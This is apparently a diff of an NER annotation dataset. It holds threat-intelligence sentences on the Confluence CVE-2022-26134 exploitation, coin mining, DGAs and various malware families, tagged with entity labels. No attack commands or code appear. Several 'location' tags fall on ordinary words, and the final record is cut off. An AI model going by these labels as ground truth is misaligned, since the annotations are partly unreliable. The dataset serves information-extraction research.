+{"id":13683,"text":"While the main collection function resides in app.js, command and control (C&C) location is embedded in JavaScript code Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":12372,"text":"For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.","entities":[{"id":38441,"label":"attack-pattern","start_offset":94,"end_offset":107},{"id":38444,"label":"location","start_offset":163,"end_offset":167},{"id":38446,"label":"location","start_offset":176,"end_offset":179},{"id":38447,"label":"location","start_offset":242,"end_offset":245}],"relations":[],"Comments":[]} +{"id":12538,"text":"The parameter rid is a global counter which records the number of exploitation attempts.","entities":[],"relations":[],"Comments":[]} +{"id":2593,"text":" We first observed the \u201cLapsus$\u201d handle mid-2021, but the first attack activity quoting that handle was in August 2021, with some U.K. mobile phone customers reporting receiving threatening texts (Figure 1).","entities":[{"id":47774,"label":"threat-actor","start_offset":24,"end_offset":31},{"id":47776,"label":"TIME","start_offset":107,"end_offset":118},{"id":47777,"label":"location","start_offset":130,"end_offset":134},{"id":47775,"label":"TIME","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} +{"id":2233,"text":" The other thread begins by collecting information about the victim, such as the following: These data points are used to generate a unique victim ID, which is stored in the following registry key: HKCU\\SOFTWARE\\Microsoft\\HY08A\\Build The malware will continue to decrypt and store embedded C2 URLs.","entities":[{"id":47328,"label":"REGISTRYKEY","start_offset":200,"end_offset":235}],"relations":[],"Comments":[]} +{"id":8990,"text":"Also, the file names involved in the decoding and loading of HyperBro are similar to those we witnessed during our investigation last year.","entities":[{"id":27777,"label":"location","start_offset":46,"end_offset":49},{"id":27778,"label":"malware","start_offset":61,"end_offset":69},{"id":27779,"label":"location","start_offset":70,"end_offset":73}],"relations":[],"Comments":[]} +{"id":2319,"text":"Once the embedded Mach-O is loaded, the dlopen and dlsym addresses found using Capstone.js are used to patch the Mach-O loaded in memory.","entities":[{"id":47393,"label":"SOFTWARE","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} +{"id":6814,"text":"Be especially wary of unsolicited emails, that come from unknown senders.","entities":[],"relations":[],"Comments":[]} +{"id":4601,"text":"Trend Micro Cloud One\u2122 \u2013 Workload Security is a cloud-native solution that provides automated security via powerful APIs.","entities":[{"id":50492,"label":"SOFTWARE","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} +{"id":3916,"text":"Outlook Web App (Web Directory) - D:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx","entities":[{"id":49771,"label":"SOFTWARE","start_offset":0,"end_offset":15},{"id":49772,"label":"FILEPATH","start_offset":36,"end_offset":149}],"relations":[],"Comments":[]} +{"id":6235,"text":"The Python script decompiled from the malware","entities":[],"relations":[],"Comments":[]} +{"id":4096,"text":"All the request data are formatted to JSON, and they are encrypted by AES and encoded by base64.","entities":[],"relations":[],"Comments":[]} +{"id":2743,"text":"Bash is present in most Linux and Unix distributions as well as Apple\u2019s Mac OS X, and there\u2019s a good chance anyone reading this has a system they need to patch.","entities":[{"id":47988,"label":"SOFTWARE","start_offset":34,"end_offset":38},{"id":47987,"label":"SOFTWARE","start_offset":24,"end_offset":29},{"id":47989,"label":"SOFTWARE","start_offset":64,"end_offset":80}],"relations":[],"Comments":[]} +{"id":1337,"text":" The malware proceeds to create a named event object of 'GoogleZCM' and uses this event in order to ensure only one instance of this malware is running at a given time.","entities":[],"relations":[],"Comments":[]} +{"id":1035,"text":" Based on our investigation, we believe that stolen accounts for these universities are actively selling on Taobao.","entities":[{"id":44920,"label":"SOFTWARE","start_offset":108,"end_offset":114},{"id":44921,"label":"attack-pattern","start_offset":45,"end_offset":60}],"relations":[{"id":195,"from_id":44921,"to_id":44920,"type":"related-to"}],"Comments":[]} +{"id":2529,"text":"Yet in our experience helping clients remediate attacks, Conti has not demonstrated any signs that it cares about its reputation with would-be victims.","entities":[{"id":45562,"label":"threat-actor","start_offset":57,"end_offset":62}],"relations":[],"Comments":[]} +{"id":13946,"text":"Phase 3: Triple extortion.","entities":[],"relations":[],"Comments":[]} +{"id":7752,"text":"Figure 17.","entities":[],"relations":[],"Comments":[]} +{"id":8887,"text":"An analysis of these tools could be used to better understand what is happening or what has happened in the environment.","entities":[],"relations":[],"Comments":[]} +{"id":14355,"text":"In January 2018, the Android variant\u2019s app label changed to Virtual Girlfriend.","entities":[{"id":51790,"label":"TIME","start_offset":3,"end_offset":15}],"relations":[],"Comments":[]} +{"id":1116,"text":"The research is ongoing but the initial results are extremely promising.","entities":[],"relations":[],"Comments":[]} +{"id":13698,"text":"All staff \u2014 from the CEO to rank-and-file employees \u2014 must learn about the different kinds of scams and what to do in case of any encounters (i.e., double-check with others and verify email details).","entities":[],"relations":[],"Comments":[]} {"id":370,"text":"After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center.","entities":[{"id":46061,"label":"vulnerability","start_offset":95,"end_offset":130},{"id":46063,"label":"SOFTWARE","start_offset":134,"end_offset":167},{"id":46062,"label":"identity","start_offset":34,"end_offset":42}],"relations":[{"id":154,"from_id":46063,"to_id":46061,"type":"has"}],"Comments":[]} -{"id":371,"text":"The details were reported to Atlassian on May 31, and Atlassian has since assigned the issue to CVE-2022-26134.","entities":[{"id":46064,"label":"TIME","start_offset":42,"end_offset":48},{"id":46065,"label":"identity","start_offset":29,"end_offset":38},{"id":46066,"label":"identity","start_offset":54,"end_offset":63},{"id":46067,"label":"vulnerability","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} -{"id":372,"text":" Based on the security advisory issued by Atlassian, it appears that the exploit is indeed an unauthenticated, remote code execution vulnerability.","entities":[{"id":44723,"label":"identity","start_offset":42,"end_offset":51},{"id":44724,"label":"attack-pattern","start_offset":111,"end_offset":132}],"relations":[],"Comments":[]} -{"id":373,"text":"If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":46068,"label":"attack-pattern","start_offset":55,"end_offset":76},{"id":46069,"label":"attack-pattern","start_offset":81,"end_offset":99}],"relations":[],"Comments":[]} -{"id":374,"text":"At the time of publication, the Palo Alto Networks attack surface management solution Cortex Xpanse identified 19,707 instances of Confluence Servers that are potentially affected by this CVE.","entities":[{"id":46070,"label":"identity","start_offset":32,"end_offset":50},{"id":46072,"label":"SOFTWARE","start_offset":131,"end_offset":149},{"id":46071,"label":"SOFTWARE","start_offset":86,"end_offset":99}],"relations":[],"Comments":[]} -{"id":375,"text":" A patch resolving the issue has been posted by Atlassian.","entities":[{"id":44725,"label":"SOFTWARE","start_offset":48,"end_offset":57}],"relations":[],"Comments":[]} -{"id":376,"text":"Palo Alto Networks strongly advises organizations to patch immediately.","entities":[{"id":46073,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":377,"text":" Updated June 7 to add additional in-the-wild observations.","entities":[{"id":46074,"label":"TIME","start_offset":9,"end_offset":15}],"relations":[],"Comments":[]} -{"id":378,"text":"Vulnerable Systems CVE-2022-26134 in the Wild Cortex Managed Threat Hunting Detections of CVE-2022-26134","entities":[{"id":44726,"label":"vulnerability","start_offset":19,"end_offset":33},{"id":44727,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44728,"label":"vulnerability","start_offset":90,"end_offset":104}],"relations":[],"Comments":[]} -{"id":379,"text":"Conclusion Indicators of Compromise ","entities":[],"relations":[],"Comments":[]} -{"id":380,"text":"The Palo Alto Networks attack surface management solution Cortex Xpanse found 19,707 instances of Confluence Servers that are potentially affected by this CVE.","entities":[{"id":46075,"label":"identity","start_offset":4,"end_offset":22},{"id":46077,"label":"SOFTWARE","start_offset":98,"end_offset":116},{"id":46076,"label":"SOFTWARE","start_offset":58,"end_offset":71}],"relations":[],"Comments":[]} -{"id":382,"text":" Additionally, the Xpanse research team also found 1,251 end-of-life versions of the Confluence Server exposed on the public internet.","entities":[{"id":46080,"label":"SOFTWARE","start_offset":85,"end_offset":102},{"id":46079,"label":"identity","start_offset":19,"end_offset":39}],"relations":[],"Comments":[]} -{"id":383,"text":"Assets running end-of-life software should never be internet-facing.","entities":[],"relations":[],"Comments":[]} -{"id":384,"text":"If an asset cannot be updated to secure versions of software, it should be isolated or decommissioned altogether.","entities":[],"relations":[],"Comments":[]} -{"id":385,"text":"To learn more about the ubiquitous problem of end-of-life software, please refer to the 2022 Cortex Xpanse Attack Surface Threat Report.","entities":[{"id":46081,"label":"TIME","start_offset":88,"end_offset":92},{"id":46082,"label":"SOFTWARE","start_offset":93,"end_offset":106}],"relations":[],"Comments":[]} -{"id":386,"text":" Thus far, Unit 42 has noted historical scans being performed by the IP addresses publicly shared by Volexity.","entities":[{"id":46084,"label":"identity","start_offset":101,"end_offset":109},{"id":46083,"label":"identity","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} -{"id":387,"text":"These scans date back as early as May 26, 2022, and target organizations in various industries.","entities":[{"id":44733,"label":"TIME","start_offset":34,"end_offset":46}],"relations":[],"Comments":[]} -{"id":388,"text":" Additionally, a purported proof of concept (PoC) has reached the public domain, increasing the threat this particular vulnerability poses.","entities":[],"relations":[],"Comments":[]} -{"id":389,"text":" The Cortex Managed Threat Hunting team has detected several exploitation attempts.","entities":[{"id":46085,"label":"identity","start_offset":5,"end_offset":39}],"relations":[],"Comments":[]} -{"id":390,"text":"Among the attempts, we found successful exploitation, which resulted in the Cerber Ransomware attack.","entities":[{"id":44734,"label":"campaign","start_offset":76,"end_offset":100}],"relations":[],"Comments":[]} -{"id":391,"text":" The ransomware was blocked by the Cortex XDR agent.","entities":[{"id":46086,"label":"SOFTWARE","start_offset":36,"end_offset":52}],"relations":[],"Comments":[]} -{"id":392,"text":"The Managed Threat Hunting team immediately reported this incident to the customer and continues to monitor our customers using the XQL queries in the following section.","entities":[{"id":46088,"label":"SOFTWARE","start_offset":132,"end_offset":135},{"id":46087,"label":"identity","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} -{"id":393,"text":"Cortex XDR also includes multiple detections for post-exploitation activities.","entities":[{"id":44735,"label":"SOFTWARE","start_offset":0,"end_offset":10},{"id":44736,"label":"attack-pattern","start_offset":49,"end_offset":77}],"relations":[],"Comments":[]} -{"id":394,"text":" Below are details of what was seen in the attempt.","entities":[],"relations":[],"Comments":[]} -{"id":395,"text":" In this case, the process tomcat.exe spawned multiple reconnaissance commands such as: whoami, systeminfo, arp, ipconfig, etc. On top of that, a Base64-encoded PowerShell command was executed and retrieved a ransomware binary.","entities":[{"id":46091,"label":"tools","start_offset":97,"end_offset":107},{"id":46092,"label":"tools","start_offset":109,"end_offset":113},{"id":46094,"label":"attack-pattern","start_offset":148,"end_offset":181},{"id":46089,"label":"FILEPATH","start_offset":28,"end_offset":38},{"id":46090,"label":"tools","start_offset":89,"end_offset":95},{"id":46093,"label":"tools","start_offset":114,"end_offset":122}],"relations":[],"Comments":[]} -{"id":396,"text":" In order to confirm the assumption that the above activity is related to CVE-2022-26134, we looked into the Confluence Apache access logs (atlassian-confluence.log) and found the PowerShell execution. The Cortex Managed Threat Hunting team continues to track any attempts to exploit CVE-2022-26134 across our customers, using Cortex XDR and the XQL queries below.","entities":[{"id":44737,"label":"vulnerability","start_offset":74,"end_offset":88},{"id":44738,"label":"vulnerability","start_offset":285,"end_offset":299},{"id":44739,"label":"SOFTWARE","start_offset":207,"end_offset":214},{"id":44740,"label":"SOFTWARE","start_offset":328,"end_offset":338},{"id":44741,"label":"SOFTWARE","start_offset":109,"end_offset":119},{"id":44742,"label":"SOFTWARE","start_offset":120,"end_offset":126},{"id":44743,"label":"tools","start_offset":180,"end_offset":190},{"id":44744,"label":"FILEPATH","start_offset":140,"end_offset":164},{"id":44745,"label":"tools","start_offset":347,"end_offset":350}],"relations":[],"Comments":[]} -{"id":397,"text":" Palo Alto Networks provides protection against the exploitation of this vulnerability in the following ways: Additionally, Xpanse has the ability to identify and detect Atlassian Confluence Servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization.","entities":[{"id":46095,"label":"identity","start_offset":1,"end_offset":19},{"id":46096,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":46097,"label":"SOFTWARE","start_offset":171,"end_offset":199}],"relations":[],"Comments":[]} -{"id":398,"text":"Xpanse is even able to classify those servers which have not been upgraded to the most recent version.","entities":[{"id":46098,"label":"SOFTWARE","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":399,"text":"These abilities will be updated to detect additional instances or versions that are insecure against this CVE.","entities":[],"relations":[],"Comments":[]} -{"id":400,"text":" Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by “Atlassian Confluence Server” in the Services tab.","entities":[{"id":46099,"label":"SOFTWARE","start_offset":10,"end_offset":16},{"id":46101,"label":"SOFTWARE","start_offset":125,"end_offset":152},{"id":46100,"label":"SOFTWARE","start_offset":79,"end_offset":99}],"relations":[],"Comments":[]} -{"id":401,"text":" As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":46102,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} -{"id":402,"text":" During the hunting process, we encountered exploitation attempts that originated from the following IP addresses: Updated June 13, 2022, at 5:30 a.m. PT.","entities":[{"id":44746,"label":"TIME","start_offset":123,"end_offset":153}],"relations":[],"Comments":[]} -{"id":403,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":404,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":405,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":406,"text":"Overview ","entities":[],"relations":[],"Comments":[]} -{"id":407,"text":"As shoppers and retailers gear up for the 2017 holiday season, they need to be aware of a new kind of cybersecurity threat they may face this year: unauthorized coin mining.","entities":[{"id":46104,"label":"attack-pattern","start_offset":148,"end_offset":172},{"id":46103,"label":"TIME","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} -{"id":408,"text":" Unauthorized coin mining is a new threat that can affect retailers and shoppers in a way that could impact or even halt their online shopping experience.","entities":[{"id":44747,"label":"attack-pattern","start_offset":1,"end_offset":25}],"relations":[],"Comments":[]} -{"id":409,"text":"A recent Unit 42 threat intelligence posting on the topic showed how 63 percent of the unauthorized coin mining sites we found came online in October 2017.","entities":[{"id":46105,"label":"identity","start_offset":9,"end_offset":16},{"id":46106,"label":"TIME","start_offset":142,"end_offset":154}],"relations":[],"Comments":[]} -{"id":410,"text":" This surge in unauthorized coin mining is driven, in large part, by the recent skyrocketing in the value of digital currencies like bitcoin.","entities":[{"id":46107,"label":"SOFTWARE","start_offset":133,"end_offset":140},{"id":46108,"label":"attack-pattern","start_offset":15,"end_offset":39}],"relations":[],"Comments":[]} -{"id":411,"text":"As that trend shows no sign of slowing down anytime soon, we can expect this to remain a very lucrative avenue for attackers.","entities":[],"relations":[],"Comments":[]} -{"id":412,"text":" Unlike other cybersecurity threats we’re used to bracing for around the holiday season, unauthorized coin mining attacks can affect shoppers who are up-to-date with security patches and even some running some security protections.","entities":[{"id":46110,"label":"attack-pattern","start_offset":89,"end_offset":121}],"relations":[],"Comments":[]} -{"id":413,"text":"And unlike spam or phishing, these attacks also don’t require any lapse in vigilance by the user: they can happen simply by going to websites users know and trust.","entities":[{"id":46111,"label":"attack-pattern","start_offset":11,"end_offset":15},{"id":46112,"label":"attack-pattern","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} -{"id":414,"text":" The good news for retailers is that these attacks are wholly preventable.","entities":[],"relations":[],"Comments":[]} -{"id":415,"text":"And for shoppers, the impact of a successful attack is minimal: there are no lasting effects or impact, making it an annoyance at worst. But because of the potential impact on holiday shopping and the ease of attacks, unauthorized coin mining is an attack that retailers need to be aware of and take active steps for prevention this holiday season.","entities":[{"id":46113,"label":"attack-pattern","start_offset":219,"end_offset":243}],"relations":[],"Comments":[]} -{"id":416,"text":" What Is Unauthorized Coin Mining?","entities":[{"id":46114,"label":"attack-pattern","start_offset":9,"end_offset":33}],"relations":[],"Comments":[]} -{"id":417,"text":" The best way to understand the threat of unauthorized coin mining is to first understand its impact.","entities":[{"id":46115,"label":"attack-pattern","start_offset":42,"end_offset":66}],"relations":[],"Comments":[]} -{"id":418,"text":"Unauthorized coin mining is an attack that can cause a user’s system to suddenly and unexpectedly slow down, sometimes significantly, when visiting a website.","entities":[{"id":46116,"label":"attack-pattern","start_offset":0,"end_offset":24}],"relations":[],"Comments":[]} -{"id":419,"text":"In a worst case, the slow-down can be so severe that it can make a website basically unusable.","entities":[],"relations":[],"Comments":[]} -{"id":420,"text":" Obviously, this impact is potentially dire for shoppers and retailers as it directly impacts and harms the online shopping experience.","entities":[],"relations":[],"Comments":[]} -{"id":421,"text":"What causes this impact is when the website the user visits is running “coin miner” code.","entities":[{"id":46117,"label":"malware","start_offset":72,"end_offset":82}],"relations":[],"Comments":[]} -{"id":422,"text":" “Coin miner” code is code used to “mine” for digital currency like bitcoin.","entities":[{"id":46118,"label":"malware","start_offset":2,"end_offset":12},{"id":46119,"label":"SOFTWARE","start_offset":68,"end_offset":75}],"relations":[],"Comments":[]} -{"id":423,"text":"Mining provides the computing necessary to power the digital currency’s infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":424,"text":"Mining is also a computationally intensive process, meaning it takes a lot of system resources.","entities":[],"relations":[],"Comments":[]} -{"id":425,"text":"Because of this, people can earn digital currency credit in exchange for the use of their computing resources to power that digital currency’s infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":426,"text":" There are many kinds of coin mining software.","entities":[],"relations":[],"Comments":[]} -{"id":427,"text":"In this case, we are concerned about coin mining code that’s used on websites.","entities":[],"relations":[],"Comments":[]} -{"id":428,"text":"When the user visits the website, the code runs on their system and “mines” on behalf of others – either the website or someone else.","entities":[],"relations":[],"Comments":[]} -{"id":429,"text":" When this is done with the visitor’s full knowledge and consent, it’s a fair and reasonable exchange.","entities":[],"relations":[],"Comments":[]} -{"id":430,"text":"For instance, there are some websites that now use coin mining as an alternative to digital advertising to generate revenue.","entities":[],"relations":[],"Comments":[]} -{"id":431,"text":"In these cases, the coin mining is authorized; the website informs the user that, while on the site, his or her computing resources will be used to “mine” digital currency, and the site will receive the credits.","entities":[],"relations":[],"Comments":[]} -{"id":432,"text":"While the user will experience a slow-down as the coin mining software is run, it is (or should be) expected, because of the notification, and so done with the site visitor’s consent.","entities":[],"relations":[],"Comments":[]} -{"id":433,"text":" Where this becomes a problem is when coin mining is done without the user’s knowledge and consent.","entities":[],"relations":[],"Comments":[]} -{"id":434,"text":"In this case the coin mining is unauthorized: in essence, it’s an attack against the user’s resources.","entities":[],"relations":[],"Comments":[]} -{"id":435,"text":" How Do Unauthorized Coin Mining Attacks Happen?","entities":[{"id":44748,"label":"attack-pattern","start_offset":8,"end_offset":32}],"relations":[],"Comments":[]} -{"id":436,"text":" Unauthorized coin mining attacks happen very simply: the website the user is visiting has special code on it that performs coin mining operations on the visitor’s computer while they’re on the website.","entities":[{"id":46120,"label":"attack-pattern","start_offset":1,"end_offset":33}],"relations":[],"Comments":[]} -{"id":437,"text":"And, as noted before, this happens without the user’s knowledge or consent.","entities":[],"relations":[],"Comments":[]} -{"id":438,"text":" Because these attacks happen due to code on the website, that code is either there with the site owner’s knowledge and permission or not.","entities":[],"relations":[],"Comments":[]} -{"id":439,"text":" When unauthorized coin mining happens with the site owner’s knowledge and permission, it’s basically a malicious site.","entities":[{"id":46121,"label":"attack-pattern","start_offset":6,"end_offset":30}],"relations":[],"Comments":[]} -{"id":440,"text":"That site’s owner is the attacker.","entities":[],"relations":[],"Comments":[]} -{"id":441,"text":"When we’re talking about online shopping, clearly there’s no threat here to the retailer: they’re the ones doing the attacking.","entities":[],"relations":[],"Comments":[]} -{"id":442,"text":"And for the shopper, it means you’re on an untrustworthy site and so open to all manner of risks beyond just unauthorized coin mining.","entities":[{"id":46122,"label":"attack-pattern","start_offset":109,"end_offset":133}],"relations":[],"Comments":[]} -{"id":443,"text":" The real, significant situation shoppers and retailers need to think about this season is when unauthorized coin mining code is on a site without that site owner’s knowledge and permission.","entities":[{"id":46123,"label":"attack-pattern","start_offset":96,"end_offset":120}],"relations":[],"Comments":[]} -{"id":444,"text":"Here the site itself has been attacked, and the site owners are also victims.","entities":[],"relations":[],"Comments":[]} -{"id":445,"text":"This is an attack against not just shoppers but the retailers operating online shopping sites.","entities":[],"relations":[],"Comments":[]} -{"id":446,"text":" How You Can Prevent Unauthorized Coin Mining Attacks If you’re a shopper, there are three things you can do to protect yourself against unauthorized coin mining attacks this holiday season: If you’re a retailer, preventing unauthorized coin mining attacks comes down to focusing on two tasks, both of which you should be doing anyway: Finally, if you’re a legitimate website that has chosen to implement coin mining to raise funds from your visitors, you can ensure that your visitors don’t think you’re engaged in unauthorized coin mining by doing three things: Conclusion Working to prevent cybercrime threats during the holiday season has become a standard part of what shoppers and retailers do every year.","entities":[],"relations":[],"Comments":[]} -{"id":447,"text":"This year, for the first time in many years, shoppers and retailers are facing a new threat, unauthorized coin mining, driven by the surge in digital currency prices.","entities":[],"relations":[],"Comments":[]} -{"id":448,"text":" While this threat can have a clear, negative impact on retailers and shoppers, the good news is that this threat is easily preventable and poses no lasting harm to consumers.","entities":[],"relations":[],"Comments":[]} -{"id":449,"text":" This is a case where forewarned is forearmed, and that forearming can result in effective prevention. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":450,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":451,"text":"This post is also available in: 日本語 (Japanese) Intro ","entities":[],"relations":[],"Comments":[]} -{"id":452,"text":"One of the most important “innovations” in malware in the past decade is what’s called a Domain Generation Algorithm (“DGA”)”.","entities":[],"relations":[],"Comments":[]} -{"id":453,"text":"DGA is an automation technique that attackers use to make it harder for defenders to protect against attacks.","entities":[],"relations":[],"Comments":[]} -{"id":454,"text":"While DGA has been in use for over 10 years now, it’s still a potent technique that has been a particular challenge for defenders to counter.","entities":[],"relations":[],"Comments":[]} -{"id":455,"text":"Fortunately, there are emerging technologies now that can better counter DGAs.","entities":[],"relations":[],"Comments":[]} -{"id":456,"text":" What is it?","entities":[],"relations":[],"Comments":[]} -{"id":457,"text":" A Domain Generation Algorithm is a program that is designed to generate domain names in a particular fashion.","entities":[],"relations":[],"Comments":[]} -{"id":458,"text":"Attackers developed DGAs so that malware can quickly generate a list of domains that it can use for the sites that give it instructions and receive information from the malware (usually referred to as “command and control” or C2).","entities":[],"relations":[],"Comments":[]} -{"id":459,"text":" Attackers use DGA so that they can quickly switch the domains that they’re using for the malware attacks.","entities":[],"relations":[],"Comments":[]} -{"id":460,"text":"Attackers do this because security software and vendors act quickly to block and take down malicious domains that malware uses.","entities":[],"relations":[],"Comments":[]} -{"id":461,"text":"Attackers developed DGA specifically to counter these actions.","entities":[],"relations":[],"Comments":[]} -{"id":462,"text":" In the past, attackers would maintain a static list of malicious domains; defenders could easily take that list and start blocking and taking down those sites.","entities":[],"relations":[],"Comments":[]} -{"id":463,"text":"By using an algorithm to build the list of domains, the attackers also make it harder for defenders to know or predict what domains will be used than if they had a simple list of domains.","entities":[],"relations":[],"Comments":[]} -{"id":464,"text":"To get that list of domains that the malware will use, defenders have to decode the algorithm which can be difficult.","entities":[],"relations":[],"Comments":[]} -{"id":465,"text":" Even then, taking down sites that malware using a DGA can be a challenge as defenders have to go through the process of working with ISPs to take down these malicious domains one by one.","entities":[{"id":46124,"label":"identity","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} -{"id":466,"text":"Many DGAs are built to use hundreds or even thousands of domains.","entities":[],"relations":[],"Comments":[]} -{"id":467,"text":"And these domains are often up for only limited periods of time.","entities":[],"relations":[],"Comments":[]} -{"id":468,"text":"In this environment blocking and taking down DGA-related domains quickly becomes a game of “whack a mole” that is sometimes futile.","entities":[],"relations":[],"Comments":[]} -{"id":469,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} \ No newline at end of file +{"id":5243,"text":"Below is a visualization of the modules: Figure 1: Structure of AnubisSpy\u2019s modules","entities":[{"id":51277,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} +{"id":2875,"text":"The exploit used in the wild contains two major parts, one is HTML which sets up the page to exploit, and the other is a Flash file which builds the memory layout in IE process and triggers the bug.","entities":[{"id":48074,"label":"SOFTWARE","start_offset":166,"end_offset":168},{"id":48075,"label":"SOFTWARE","start_offset":121,"end_offset":126}],"relations":[],"Comments":[]} +{"id":11668,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":2841,"text":"But these reports haven\u2019t been conclusively verified.","entities":[],"relations":[],"Comments":[]} +{"id":12077,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":37384,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":37385,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} +{"id":10170,"text":"In 2016, we published a report on C Major, an espionage group that primarily targets the Indian military.","entities":[],"relations":[],"Comments":[]} +{"id":5422,"text":"Moreover, the purpose of this botnet is still unclear: Whether it is intended to be used for distributed denial-of-service (DDoS) attacks, espionage, or proxy networks remains to be seen.","entities":[{"id":51429,"label":"attack-pattern","start_offset":93,"end_offset":129}],"relations":[],"Comments":[]} +{"id":5388,"text":"Using historical data of internet-wide scans and SSL certificate data, it is likely that Cyclops Blink dates back to at least June 2019.","entities":[{"id":51382,"label":"malware","start_offset":89,"end_offset":102},{"id":51383,"label":"TIME","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} +{"id":8159,"text":"AndroidOS_MtkSu.A a265c32ed1ad47370d56cbd287066896d6a0c46c80a0d9573d2bb915d198ae42 com.callCam.android.callCam2base callCamm","entities":[{"id":25248,"label":"SHA2","start_offset":18,"end_offset":82}],"relations":[],"Comments":[]} +{"id":5480,"text":"The succeeding users and chatrooms were created on October 31 and December 12 the latest.","entities":[{"id":51472,"label":"TIME","start_offset":51,"end_offset":61},{"id":51473,"label":"TIME","start_offset":66,"end_offset":77}],"relations":[],"Comments":[]} +{"id":6440,"text":"Technical Analysis","entities":[],"relations":[],"Comments":[]} +{"id":4360,"text":"While the code quality of its payloads is not of the highest standard, this threat actor uses innovative techniques when crafting its malicious documents, such as hiding malicious code in the comments section, or using encrypted documents to prevent automatic analysis.","entities":[],"relations":[],"Comments":[]} +{"id":12493,"text":"It was last updated on May 12, 2022.","entities":[],"relations":[],"Comments":[]} +{"id":10297,"text":"MSIL.OCEANMAP.A","entities":[],"relations":[],"Comments":[]} +{"id":1785,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":5462,"text":"We stumbled upon the Confucius hacking group while delving into Patchwork\u2019s cyberespionage operations, and found a number of similarities.","entities":[{"id":51448,"label":"threat-actor","start_offset":64,"end_offset":73},{"id":51449,"label":"threat-actor","start_offset":21,"end_offset":30}],"relations":[{"id":1096,"from_id":51449,"to_id":51448,"type":"related-to"}],"Comments":[]} +{"id":2196,"text":" When initially run, the malware checks to see if its parent process is either explorer.exe or cmd.exe.","entities":[{"id":45421,"label":"FILEPATH","start_offset":95,"end_offset":102},{"id":45420,"label":"FILEPATH","start_offset":79,"end_offset":91}],"relations":[],"Comments":[]} +{"id":12090,"text":"Understanding the techniques used by attackers helps us counter these threats effectively.","entities":[],"relations":[],"Comments":[]} +{"id":47,"text":"As anti-fraud protections evolved, so did the criminals.","entities":[],"relations":[],"Comments":[]} +{"id":7023,"text":"After finding multiple tools belonging to the Iron Tiger threat actor (which we now track as Earth Smilodon), it is likely that the new malware families that we found during the Operation DRBControl investigation came from the same threat actor.","entities":[{"id":22019,"label":"threat-actor","start_offset":46,"end_offset":56},{"id":22020,"label":"threat-actor","start_offset":93,"end_offset":107},{"id":22021,"label":"location","start_offset":116,"end_offset":122},{"id":22023,"label":"location","start_offset":227,"end_offset":231}],"relations":[],"Comments":[]} +{"id":5648,"text":"From here the attacker can sell the code to someone else for cash, or redeem it directly. While in the example here Cardbuyer targeted the Tianxiafu service, all of the services listed above are targets already pre-defined in its source code.","entities":[{"id":17392,"label":"location","start_offset":23,"end_offset":26},{"id":17393,"label":"location","start_offset":61,"end_offset":65},{"id":17396,"label":"location","start_offset":192,"end_offset":195},{"id":17397,"label":"attack-pattern","start_offset":231,"end_offset":237}],"relations":[],"Comments":[]} +{"id":2035,"text":" Both versions have been compiled with the same compiler (believed to be GCC 3.x and above based on the mangling of export names), resulting in very similar exports between not only the ransomware variants, but also other malware that we have linked to the potential author (Figure 11). The biggest difference between the versions is the interesting addition of a secondary payload embedded within version 2.","entities":[{"id":47131,"label":"SOFTWARE","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} +{"id":12343,"text":"As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns.","entities":[{"id":38334,"label":"location","start_offset":65,"end_offset":69},{"id":38335,"label":"attack-pattern","start_offset":77,"end_offset":93}],"relations":[],"Comments":[]} +{"id":2236,"text":"It initially performs a DNS check against microsoft.com to ensure it has Internet connectivity.","entities":[],"relations":[],"Comments":[]} +{"id":3418,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10307,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":2719,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) In March 2020 Microsoft released a security advisory, ADV200005 | Microsoft 